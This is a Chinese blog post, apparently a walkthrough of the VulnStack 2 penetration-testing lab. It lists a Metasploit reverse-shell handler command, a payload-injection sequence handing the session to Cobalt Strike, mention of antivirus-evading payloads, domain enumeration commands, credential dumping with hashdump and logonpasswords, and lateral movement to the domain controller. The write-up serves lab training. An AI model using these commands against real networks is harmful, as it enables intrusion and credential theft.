0
点赞
收藏
分享

微信扫一扫

内网渗透靶机-VulnStack 2

贵州谢高低 2022-02-21 阅读 348

目录

内网渗透靶机-VulnStack 2

主机发现

端口扫描

192.168.111.128

192.168.111.201

漏洞利用

内网信息收集

ipconfig /all

Tasklist

shell net group "domain users" /domain

shell net group “domain admins” /domain

shell net group “domain computers” /domain

shell net group “domain controllers” /domain

shell net time /domain

shell nslookup DC.de1ay.com

抓取WEB主机的密码

内网横向


内网渗透靶机-VulnStack 2

主机发现

发现存在192.168.111.128、192.168.111.201两台目标主机,192.168.111.130为kali攻击机

端口扫描

192.168.111.128

192.168.111.201

漏洞利用

445端口存在永恒之蓝漏洞,可能存在杀毒软件所以无法利用

192.168.111.128 7001端口存在反序列化漏洞

上传马

在kali上执行如下命令:

msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.111.130; set lport 4444; run; "

使用掩日2.1生成msf免杀马,使用冰鞋上传并且执行

Msf成功上线

msf上线cs

msf使用注入模块 + cs创建Listener监听 (相同payload)

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set DisablePayloadHandler true

set lhost (cs listener ip)

set lport (cs listener port)

set session (id)

Run

CS成功上线

使用ms14-058提权

内网信息收集

ipconfig /all

存在域de1ay.com

两个网卡,ip分别为192.168.111.128、10.10.10.80

Tasklist

查看进程,存在360杀毒

shell net group "domain users" /domain

查看域用户,存在用户Administrator、de1ay、krbtgt、mssql

shell net group “domain admins” /domain

查看域管理员账号,域管理员账号为Administrator

shell net group “domain computers” /domain

查看域中的机器,除了域控之外还有WEB和PC两台机器

shell net group “domain controllers” /domain

查看域控制器

shell net time /domain

查询域控主机名

shell nslookup DC.de1ay.com

查询域控对应的ip

内网另外一台机器的ip为

抓取WEB主机的密码

hashdump
logonpasswords

内网横向

尝试使用cs横向

首先建立一个smb监听

利用上面爬取到的密码进行横向

成功拿到域控的权限

按照上面的方法,同样拿下PC机器

成果如图所示:

举报

相关推荐

0 条评论